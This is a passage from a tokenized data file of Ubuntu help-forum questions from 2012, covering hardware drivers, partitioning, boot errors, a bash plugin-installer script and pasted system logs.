/lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic is valid . 2012-07-11t15:35:19.787z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.796z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.805z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.814z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.824z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:19.829z| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:19.829z| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-07-11t15:35:19.829z| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-07-11t15:35:19.829z| vthread-3| i120 : validating path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:19.834z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:19.857z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:19.945z| vthread-3| i120 : header path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic is valid . 2012-07-11t15:35:25.503z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:25.514z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:25.523z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:25.533z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:25.542z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:26.338z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:26.338z| vthread-3| i120 : validating path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:26.343z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:26.368z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:26.455z| vthread-3| i120 : header path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic is valid . 2012-07-11t15:35:26.455z| vthread-3| i120 : building module vmmon . 2012-07-11t15:35:26.455z| vthread-3| i120 : extracting the sources of the vmmon module . 2012-07-11t15:35:26.484z| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmmon-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-26-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-07-11t15:35:35.469z| vthread-3| i120 : installing module vmmon from /tmp/vmware-root/modules/vmmon.o to /lib/modules/3.2.0-26-generic/misc . 2012-07-11t15:35:35.470z| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-26-generic/misc/vmmon.ko 2012-07-11t15:35:39.713z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:39.713z| vthread-3| i120 : validating path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:39.719z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:39.753z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:39.845z| vthread-3| i120 : header path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic is valid . 2012-07-11t15:35:39.845z| vthread-3| i120 : building module vmnet . 2012-07-11t15:35:39.846z| vthread-3| i120 : extracting the sources of the vmnet module . 2012-07-11t15:35:39.913z| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmnet-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-26-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-07-11t15:35:49.683z| vthread-3| i120 : failed to compile module vmnet ! 2012-07-11t15:35:49.704z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:35:49.705z| vthread-3| i120 : validating path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:35:49.729z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:49.874z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:35:49.961z| vthread-3| i120 : header path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic is valid . 2012-07-11t15:35:49.961z| vthread-3| i120 : building module vmblock . 2012-07-11t15:35:49.961z| vthread-3| i120 : extracting the sources of the vmblock module . 2012-07-11t15:35:50.159z| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmblock-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-26-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-07-11t15:35:59.283z| vthread-3| i120 : installing module vmblock from /tmp/vmware-root/modules/vmblock.o to /lib/modules/3.2.0-26-generic/misc . 2012-07-11t15:35:59.284z| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-26-generic/misc/vmblock.ko 2012-07-11t15:36:04.318z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:36:04.319z| vthread-3| i120 : validating path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:36:04.324z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:36:04.344z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:36:04.427z| vthread-3| i120 : header path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic is valid . 2012-07-11t15:36:04.427z| vthread-3| i120 : building module vmci . 2012-07-11t15:36:04.428z| vthread-3| i120 : extracting the sources of the vmci module . 2012-07-11t15:36:04.456z| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmci-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-26-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-07-11t15:36:15.728z| vthread-3| i120 : installing module vmci from /tmp/vmware-root/modules/vmci.o to /lib/modules/3.2.0-26-generic/misc . 2012-07-11t15:36:15.730z| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-26-generic/misc/vmci.ko 2012-07-11t15:36:20.349z| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-26-generic . 2012-07-11t15:36:20.350z| vthread-3| i120 : validating path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic 2012-07-11t15:36:20.355z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:36:20.378z| vthread-3| i120 : your gcc version : 4.6 2012-07-11t15:36:20.464z| vthread-3| i120 : header path /lib/modules/3.2.0-26-generic/build/include for kernel release 3.2.0-26-generic is valid . 2012-07-11t15:36:20.464z| vthread-3| i120 : building module vmci . 2012-07-11t15:36:20.464z| vthread-3| i120 : extracting the sources of the vmci module . 2012-07-11t15:36:20.514z| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmci-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-26-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-07-11t15:36:22.732z| vthread-3| i120 : building module vsock . 2012-07-11t15:36:22.732z| vthread-3| i120 : extracting the sources of the vsock module . 2012-07-11t15:36:22.783z| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vsock-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-26-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-07-11t15:36:33.825z| vthread-3| i120 : installing module vsock from /tmp/vmware-root/modules/vsock.o to /lib/modules/3.2.0-26-generic/misc . 2012-07-11t15:36:33.826z| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-26-generic/misc/vsock.ko
162409	brightness not working on an hp pavilion dv6 with a ati radeon hd6770m	i was always unable to change my brightness since i installed ubuntu , but i figured that installing the latest ati driver for my graphics card would work . i did , but i still ca n't change the brightness . the slider goes up and down , but the brightness stays the same ( on full ) . i have switchable graphics , an ati radeon hd 6770m , and an intel integrated gpu .
162410	ca n't accept eula for ubuntu restricted extras	i ca n't install ubuntu restricted extras because a microsoft eula pops up that i can not respond to , so i can not finish the total install . i have tried omitting the microsoft bits but that doesnât work either .
162412	pinning ipython3 qtconlsole to launcher	i 've installed both ipython ( which uses python 2.7 ) and ipython3 , and the respective qtconsole packages . both work when i call them from the terminal like ipython qtconsole . however , when i search for them in the dash home , only the 2.7 versions ( of both the shell and qtconsole ) appear , as executables . searching for ipython3 only yields the ipython3 file from /usr/bin . changing to the `` application lens '' does n't affect the results . also , even if i can start both from the terminal , i can only pin the running 2.7 version to the launcher -- or , to be more exact , i can pin the v3 console , but the icon looks somehow blurred , and it does n't start anything when i click it . so , whats happening here ? is the v3 package hidden somehow ?
162417	how can i check the permissions of a specific group ?	i 've a group on my system and i do n't know which permission it has . where can i find all group permissions ? i want to have an output like this : folders owned by group 'test' /home/test/documents/ /home/test/pictures/ /var/www/website/ var/www/python/
162419	how do i fix laptop speakers popping when no sound is playing ?	i am running ubuntu 12.04 on a hp pavilion dv6 . about a week after setting up my dual-boot win7/ubuntu , my laptop speakers began a soft popping sound on roughly 5 second intervals . it 's the damnedest thing ; the popping will occur at the same volume regardless of the system volume ( even when muted ) . the fix is to play any sound , and the popping goes away ( again even if the system is muted and the music/video/etc . is playing ) . maybe i erroneously updated the wrong hp sound card drivers , but i have n't the slightest idea otherwise.. any thoughts ?
162422	dual boot win7/ubuntu 12.04 hd0 out of disk error	i 've got an acer aspire 5750-6866 ( 8gb internal memory ) , dual booting ubuntu/win7 . the other day i started getting hd0 out of disk error and a boot screen that is completely different than what i was getting before ( purple boot screen ) . windows booted correctly . but after a reboot where i got the same screen , neither ubuntu nor windows would boot normally ; ubuntu hangs at the boot screen ( black screen after the initial loading screen ) , windows boots to startup repair that i 've left repairing for 24 hours to no avail , with no option to cancel . steps taken : booting from windows essentials disk - could not detect harddrive bios - did not show harddrive information , but will show harddrive in boot options gparted live - shows harddrive beeing unallocated tried to fix grub - can not mount /dev/sda tried to chkdsk the harddrive but windows still wont detect disk for it booting from live usb with boot-repair - it will not boot into it . my final option is reinstalling ubuntu - but during installation get a input/output error regarding the hd i would really appreciate any help you can give me . i 'm not sure if there are other things i could try , or if it 's the hard drive or motherboard that needs replacing/fixing . i really hope this is something i can fix with this hardware . any help you can give me would be great , even if you just point me in the right direction , i truly am stuck here .
162423	can i downgrade x in 12.04 ?	is it possible to successfully downgrade x to 1.10.99 . * or earlier in 12.04 ? i have tried with synaptic- > package- > force version , but it only shows me two versions of 1.11.4 . downgrading would restore some broken accessibility functionality that i rely on to use ubuntu effectively . edit : specifically , the latchlock feature of sticky keys in xkb no longer works . two bug reports : https : //bugs.launchpad.net/ubuntu/+bug/998877 https : //bugs.freedesktop.org/show_bug.cgi ? id=51955
162434	how do i find out usb speed from a terminal ?	i am using ubuntu 12.04 . i am here to know is there any way to observe writing & reading speed of the usb through the terminal .
162435	changing user-name on https : //myapps.developer.ubuntu.com/dev/	i am facing some problems , i want to change login name on https : //myapps.developer.ubuntu.com/dev/ can any one tell me how to do that ? screenshot is attached for reference
162439	why does ubuntu server run both cron and atd ?	from the man pages it appears both do basically the same thing , why have both running on the system at the same time ? from the wording in the man pages it looks like cron will repeatedly run programs at scheduled times while atd may run them only once , is this why ?
162440	how to change account to write reviews for ubuntu software center ?	i want to write reviews for applications using another account . in ubuntu one , it 's possible to sign out at will , but i ca n't do that on the ubuntu software center . how can i change accounts ?
162441	is there any video-chat-via-lan software ?	is there any video-chat-via-lan application that does n't require an internet connection ?
162447	how to write vertical sentences in libre office writer ?	i would like to know how to type sentences vertically in libreoffice word and libreoffice impress , thanks
162449	how to make changes while viewing a diff in bzr explorer ?	bzr explorer is the gui tool for bazaar ( bzr ) . it can show diffs pretty nicely , but i ca n't seem to figure out a way to make changes in the diff viewer . other basic functions would be the ability to copy entire chunks of differences from the base version to the working copy . i 'm wondering if the function exists and i just can not find it , or maybe the function does not exist at all . if this is not possible within bzr explorer , then i 'd like to know how i can configure bazaar to view ( and edit ! ) differences in gvimdiff . at the moment when i want to do this , i first dump the original version of a file with bzr cat -r123 file > file.r123 and run gvimdiff in a separate step , which is tedious .
162456	paper gets out hl-2250dn to slow	i 've got a printer 'brother hl-2250dn ' . my problem : it sometimes prints extremely slow ... ! my ubuntu : precise pangolin
162464	network file sharing mechanisms in ubuntu	i have noticed ubuntu has several mechanisms to share folders with other machines on a network : for example , if i am in nautilus ( the file manager ) , i can right click on a folder , go to properties , and then go to the tab share and activate share this folder . i can also install samba , edit the file /etc/samba/smb.conf to enable access to a specific folder and start the service . i noticed that if i use both approaches simultaneously to enable access to the same folder , i can actually see two links to the same folder on explorer when i access my machine through a network path from windows . my questions are : what is the first mechanism based on ? ( is it running another instance of samba behind the scenes ? if so , where is the smb.conf file for it ? why the redundancy ? are there any other mechanisms to share folders ? for reference , this is all on ubuntu 12.04 , from a virtual machine ( virtual box ) from within windows 7 64 .
162465	are gcc versions tied to kernel versions ?	is there any link between gcc versions and the version of a kernel ? specifically , would i be able to install a very old version of gcc onto the latest kernel . alternatively would i be able to build the latest version of gcc on a very old kernel ? are there any compatibility problems between the two for any version ? ?
162466	grub2 screen navigation	once i select a submenu from the main menu in grub ( i.e . ) `` previous linux versions '' it seems i 'm forced to only choose an item in the submenu without no option to navigate up to the main menu again . is there a keystroke i 'm missing to 'abort ' a submenu and go back to the main screen ?
162474	how can i install a nc375i network card on ubuntu 12.04 ?	how can i install a nc375i network card on ubuntu 12.04 ? the server i am using is an hp proliant ml370 g6 . the hp help does n't work for me .
162476	how to check if trim is working for an encrypted volume ?	you can easily check if trim works for a `` normal '' ext4 partition : http : //askubuntu.com/a/19480/5920 . how to do that for a luks-encrypted one ? let 's assume the default luks setup made by 12.04 alternate installer ( i.e . the one with lvm involved ) . update what i 'm asking here is how i can check that the block on the disk is actually filled with zeros after removing the file , if the file is stored in an encrypted volume .
162477	how are packages actually installed via apt-get install ?	when using the apt-get install method to install a package onto ubuntu , is there any fundamental difference between obtaining the source code for that package and building it from scratch ? does the apt-get install functionality simply download source and build it on your machine to a specified directory or is there more going on behind the scenes ? finally ( maybe this has no answer ) is one method better than the other ? what i am angling at here is does the build it yourself from source code have any advantages or is it better to let apt-get do its thing ?
162484	annoying file system check , when starting the computer with wol	sometimes i need to get some files from my desktop computer , so i send a wake on lan package ( using my laptop ) to the computer and it turns on . but every 30 times i have to wait ~30 minutes for the file system check ( and i ca n't cancel it through ssh or so ) . many people would like to move the file system check to shutdown , but these projects and ideas seem to be quite abandoned : https : //wiki.ubuntu.com/autofsck https : //blueprints.launchpad.net/ubuntu/+spec/prompt-for-fsck-on-shutdown http : //brainstorm.ubuntu.com/idea/11021/ i tried to use autofsck , but i did not succeed to get it work with lightdm - see : run a script with user interaction on log out / shutdown ? maybe somebody has a different idea for an work a round ? disabling the file system check is not an option for me .
162486	console-only alternative for fslint ?	are there any console-only alternatives to the fslint package in ubuntu ? i do n't want to install x11-common , fonts and many of the other dependencies required by it on a server system . note : this is not just about finding duplicates . fslint offers all kinds of fine features to fix broken file/folder names , for example .
162494	minimal ubuntu 12.04 for programming	i 'm new to linux , i 've windows 7 installed side by side with ubuntu 12.04 . i want to use ubuntu for the sole purpose of programming and for that i 've already removed many programs which i do n't need for eg . evolution , media players , etc . things i need for survival are : chrome python gcc pdf reader vim synaptic package manager i seriously do n't need anything else , but while removing some programs for eg . `` the sound recorder '' , it says it 'll remove `` the ubuntu desktop system '' as well , is it safe to remove it ? the window manager is still heavy on the graphics and there are still a lot of programs which i do n't use and never will . is there any way to make it less graphic intensive like for example `` windows classic mode '' , and remove the heavy graphic versions all together . also i do n't want to start from scratch as i 've a slow internet connection and downloading packages and updates again will take a lot of time . by graphics heavy i want to add the following as well the touch pad is slow , i do n't know slow or not smooth .
162499	battery life on a lenovo ideapad u410 ultrabook	i have bought a lenovo ideapad u410 last week . normally i only use ubuntu , so i tried to install it . after a few ( or a few more ; ) ) hours i got it working . i used both systems , ubuntu and windows , without problems . now my windows system dose n't boot anymore , but that is another story ... today i noticed that the battery life is only about 3 hours ( the u410 should have a battery life of about 9 hours ! ) . also the ultrabook gets very , very hot . does anyone know how i can increase the battery life and handle this `` gets too hot '' thing ? i 'm really concerned about my new baby = )
162502	using unallocated space when not adjacent to extended partition	i need to use the unallocated space without deleting the sda7 partition in deed the unallocated partition is next to swap partition device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 204799999 102296576 7 hpfs/ntfs/exfat /dev/sda3 204802046 415737855 105467905 5 extended partition 3 does not start on physical sector boundary . /dev/sda5 204802048 302456831 48827392 83 linux /dev/sda6 302458880 318081023 7811072 82 linux swap / solaris /dev/sda7 318083072 415737855 48827392 83 linux the last partition is 750 gb when i try to make a new partition , it assumes it is primary ( as other options ) are disabled , but does not accept 'add ' in gparted meaning that is not acceptable . can someone help ?
162503	bash downloading file	now all i have problems with is the yes no statements . they are n't allowing input but look setup like the rest of them ... mc_addplugin ( ) { if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is running ! '' echo `` please stop the service before adding a plugin . '' else echo `` paste the url to the .jar plugin ... '' read jarurl jarname= $ ( basename `` $ jarurl '' ) echo `` $ jarname '' if [ -d `` $ tempplugins '' ] then as_user `` cd $ templugins & & wget -a.jar -o ./ $ jarname $ jarurl '' else as_user `` cd $ pluginspath & & mkdir $ tempplugins & & cd $ tempplugins & & wget -a.jar -o ./ $ jarname $ jarurl '' fi if [ -f `` ./ $ jarname '' ] then as_user `` cd $ pluginspath '' if [ -f `` ./ $ jarname '' ] then if `diff $ pluginspath/ $ jarname $ tempplugins/ $ jarname > /dev/null` then echo `` you are already running the latest version of $ jarname . '' now=`date `` + % y- % m- % d_ % hh % m '' ` echo `` are you sure you want to overwrite this plugin ? [ y/n ] '' echo `` note : your old plugin will be moved to the `` $ tempplugins '' folder with todays date . '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) as_user `` mv $ pluginspath/ $ jarname $ tempplugins/ $ { jarname } _ $ { now } & & mv $ tempplugins/ $ jarname $ pluginspath/ $ jarname & & rm -rf $ tempplugins '' ; echo `` plugin has been install successfully ! `` ; break ; ; no ) echo `` the plugin has not been installed ! removing temporary plugin and exiting ... '' as_user `` rm $ tempplugins/ $ jarname '' ; exit ; ; esac done echo `` would you like to start the $ service now ? [ y/n ] '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) mc_start ; break ; ; no ) `` $ service not running ! to start the service run : /etc/init.d/craftbukkit start '' ; exit ; ; esac done else now=`date `` + % y- % m- % d_ % hh % m '' ` echo `` are you sure you want to overwrite this plugin ? [ y/n ] '' echo `` note : your old plugin will be moved to the `` $ tempplugins '' folder with todays date . '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) as_user `` mv $ pluginspath/ $ jarname $ tempplugins/ $ { jarname } _ $ { now } & & mv $ tempplugins/ $ jarname $ pluginspath/ $ jarname & & rm -rf $ tempplugins '' ; echo `` plugin has been install successfully ! `` ; break ; ; no ) echo `` the plugin has not been installed ! removing temporary plugin and exiting ... '' as_user `` rm $ tempplugins/ $ jarname '' ; exit ; ; esac done echo `` would you like to start the $ service now ? [ y/n ] '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) mc_start ; break ; ; no ) `` $ service not running ! to start the service run : /etc/init.d/craftbukkit start '' ; exit ; ; esac done fi else echo `` are you sure you want to add this new plugin ? [ y/n ] '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) as_user `` mv $ pluginspath/ $ jarname $ tempplugins/ $ { jarname } _ $ { now } & & mv $ tempplugins/ $ jarname $ pluginspath/ $ jarname '' ; break ; ; no ) echo `` the plugin has not been installed ! removing temporary plugin and exiting ... '' as_user `` rm $ tempplugins/ $ jarname '' ; exit ; ; esac done echo `` would you like to start the $ service now ? [ y/n ] ? '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) mc_start ; break ; ; no ) `` $ service not running ! to start the service run : /etc/init.d/craftbukkit start '' ; exit ; ; esac done fi else echo `` failed to download the plugin from the url you specified ! '' exit ; fi fi } when ran you get something like : you are already running the latest version of vault.jar . are you sure you want to overwrite this plugin ? [ y/n ] note : your old plugin will be moved to the /home/pyrexiacraft/server/plugins/temp_plugins folder with todays date . 1 ) yes 2 ) no # ? y
162506	access denied - error code 70	i can not open my most recent ( and most important ) text document in libre office , a pre publication draft of a book . it 's the only document this has ever happened to - all others on my pc are accessible . i have windows xp . any clues anyone ?
162515	is it possible to convert a non partitioned drive to an mbr partition with out losing data ? ( ubuntu 12.04 )	i tried gparted , but it does n't like seeing an ext4 file system without the partition type being specified ( i suspect ) . so it wo n't let me resize or anything since there is no partition . it is occurring to me that having a non partitioned drive with data on it is playing with fire . worse yet , it is my /home mount point . obviously i can do a full backup of my data and start from the ground up but i was hoping someone would have an idea of how i can do it without spending time on the backup/restore . i realize this is a slim to none . here 's to hoping for someone more creative than myself providing a slim . here 's a screenshot of the disk utility , showing what i mean by no partition : here is my fdisk -l output : disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table
162516	switching window manager/desktop environments ?	in general what is the approach to switch the desktop environment or window manager on ubuntu ? the main difference between stock ubuntu , kubuntu and lubuntu is supposedly the use of unity vs. kde vs. lxde . however , in order to try various desktop environments and window managers i do n't want to have to reinstall the respective flavor from scratch just to get a particular desktop environments or window manager . there probably is an easier method than that . the question : how can i easily test different desktop environments and respective compatible window managers ( say kde , lxde , unity , gnome , xfce and stumpwm ) ?
162519	close the notifications that hover over the current window	is it possible to dismiss the notifications that hover over the current window ? i 've noticed that they become translucent on mouseover ( but they still tend to cover part of the current window ! ) . is it possible to actually close these notifications so that they will be slightly less irritating ?
162520	miro guide or ubuntu music store wouldnt open in banshee	i am using ubuntu 12.04 , i recently updated from the 11.10 version . the miro guide or the ubuntu music store wouldnt open in banshee or rhythmbox music player . it always leaves the following message : unable to load page problem occurred while loading the url http : //integrated-services.banshee.fm/miro/audio/home/ can not resolve proxy hostname ( )
162524	wireless card power management	i have noticed that when my computer in plugged in , the wireless strength increases . i 'm assuming this is to do with power management . is there a way to disable wireless power management ? i have found a few blog posts that show hacks to disable this but what is best practice here ? should there not be an option via the power menu that lets you toggle this ? edit -- files and logs as requested /var/log/kern.log jul 11 11:45:27 coolbreeze kernel : [ 6.528052 ] postgres ( 1308 ) : /proc/1308/oom_adj is deprecated , please use /proc/1308/oom_score_adj instead . jul 11 11:45:27 coolbreeze kernel : [ 6.532080 ] [ fglrx ] gart uswc size:1280 m. jul 11 11:45:27 coolbreeze kernel : [ 6.532084 ] [ fglrx ] gart cacheable size:508 m. jul 11 11:45:27 coolbreeze kernel : [ 6.532091 ] [ fglrx ] reserved fb block : shared offset:0 , size:1000000 jul 11 11:45:27 coolbreeze kernel : [ 6.532094 ] [ fglrx ] reserved fb block : unshared offset : f8fd000 , size:403000 jul 11 11:45:27 coolbreeze kernel : [ 6.532098 ] [ fglrx ] reserved fb block : unshared offset:3fff4000 , size : c000 jul 11 11:45:38 coolbreeze kernel : [ 17.423743 ] eth1 : no ipv6 routers present jul 11 11:46:37 coolbreeze kernel : [ 75.836426 ] warning : `proftpd ' uses 32-bit capabilities ( legacy support in use ) jul 11 11:46:37 coolbreeze kernel : [ 75.884215 ] init : plymouth-stop pre-start process ( 2922 ) terminated with status 1 jul 11 11:54:25 coolbreeze kernel : [ 543.679614 ] eth1 : no ipv6 routers present dmesg [ 1.411959 ] acpi : power button [ pwrb ] [ 1.412046 ] input : sleep button as /devices/lnxsystm:00/device:00/pnp0c0e:00/input/input1 [ 1.412054 ] acpi : sleep button [ slpb ] [ 1.412150 ] input : lid switch as /devices/lnxsystm:00/device:00/pnp0c0d:00/input/input2 [ 1.412765 ] acpi : lid switch [ lid0 ] [ 1.412866 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input3 [ 1.412874 ] acpi : power button [ pwrf ] [ 1.412996 ] acpi : fan [ fan0 ] ( off ) [ 1.413068 ] acpi : fan [ fan1 ] ( off ) [ 1.419493 ] thermal lnxtherm:00 : registered as thermal_zone0 [ 1.419498 ] acpi : thermal zone [ tz00 ] ( 27 c ) [ 1.421913 ] thermal lnxtherm:01 : registered as thermal_zone1 [ 1.421918 ] acpi : thermal zone [ tz01 ] ( 61 c ) [ 1.421971 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared [ 1.421986 ] acpi : battery slot [ bat0 ] ( battery present ) [ 1.422062 ] erst : table is not found ! [ 1.422067 ] ghes : hest is not enabled ! [ 1.422158 ] isapnp : scanning for pnp cards ... [ 1.422242 ] serial : 8250/16550 driver , 32 ports , irq sharing enabled [ 1.434620 ] acpi : battery slot [ bat0 ] ( battery present ) [ 1.736355 ] freeing initrd memory : 14352k freed [ 1.777846 ] isapnp : no plug & play device found [ 1.963650 ] linux agpgart interface v0.103 [ 1.967148 ] brd : module loaded [ 1.968866 ] loop : module loaded [ 1.969134 ] ahci 0000:00:1f.2 : version 3.0 [ 1.969154 ] ahci 0000:00:1f.2 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 1.969226 ] ahci 0000:00:1f.2 : irq 45 for msi/msi-x [ 1.969277 ] ahci : sss flag set , parallel bus scan disabled [ 1.969320 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 3 gbps 0x23 impl sata mode [ 1.969329 ] ahci 0000:00:1f.2 : flags : 64bit ncq sntf stag pm led clo pio slum part ems sxs apst [ 1.969338 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 1.983340 ] scsi0 : ahci [ 1.983515 ] scsi1 : ahci [ 1.983670 ] scsi2 : ahci [ 1.983829 ] scsi3 : ahci [ 1.983985 ] scsi4 : ahci [ 1.984145 ] scsi5 : ahci [ 1.984270 ] ata1 : sata max udma/133 abar m2048 @ 0xf1005000 port 0xf1005100 irq 45 [ 1.984277 ] ata2 : sata max udma/133 abar m2048 @ 0xf1005000 port 0xf1005180 irq 45 [ 1.984282 ] ata3 : dummy [ 1.984285 ] ata4 : dummy [ 1.984288 ] ata5 : dummy [ 1.984292 ] ata6 : sata max udma/133 abar m2048 @ 0xf1005000 port 0xf1005380 irq 45 [ 1.985150 ] fixed mdio bus : probed [ 1.985192 ] tun : universal tun/tap device driver , 1.6 [ 1.985196 ] tun : ( c ) 1999-2004 max krasnyansky < maxk @ qualcomm.com > [ 1.985285 ] ppp generic driver version 2.4.2 [ 1.985472 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 1.985507 ] ehci_hcd 0000:00:1a.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 1.985534 ] ehci_hcd 0000:00:1a.0 : setting latency timer to 64 [ 1.985541 ] ehci_hcd 0000:00:1a.0 : ehci host controller [ 1.985626 ] ehci_hcd 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 1.985666 ] ehci_hcd 0000:00:1a.0 : debug port 2 [ 1.989663 ] ehci_hcd 0000:00:1a.0 : cache line size of 64 is not supported [ 1.989690 ] ehci_hcd 0000:00:1a.0 : irq 16 , io mem 0xf1005800 [ 2.002183 ] ehci_hcd 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 2.002447 ] hub 1-0:1.0 : usb hub found [ 2.002455 ] hub 1-0:1.0 : 3 ports detected [ 2.002607 ] ehci_hcd 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 2.002633 ] ehci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 2.002639 ] ehci_hcd 0000:00:1d.0 : ehci host controller [ 2.002737 ] ehci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 2.002775 ] ehci_hcd 0000:00:1d.0 : debug port 2 [ 2.006780 ] ehci_hcd 0000:00:1d.0 : cache line size of 64 is not supported [ 2.006806 ] ehci_hcd 0000:00:1d.0 : irq 23 , io mem 0xf1005c00 [ 2.022161 ] ehci_hcd 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 2.022401 ] hub 2-0:1.0 : usb hub found [ 2.022409 ] hub 2-0:1.0 : 3 ports detected [ 2.022567 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 2.022599 ] uhci_hcd : usb universal host controller interface driver [ 2.022720 ] usbcore : registered new interface driver libusual [ 2.022813 ] i8042 : pnp : ps/2 controller [ pnp0303 : ps2k , pnp0f13 : ps2m ] at 0x60,0x64 irq 1,12 [ 2.035831 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 2.035844 ] serio : i8042 aux port at 0x60,0x64 irq 12 [ 2.036096 ] 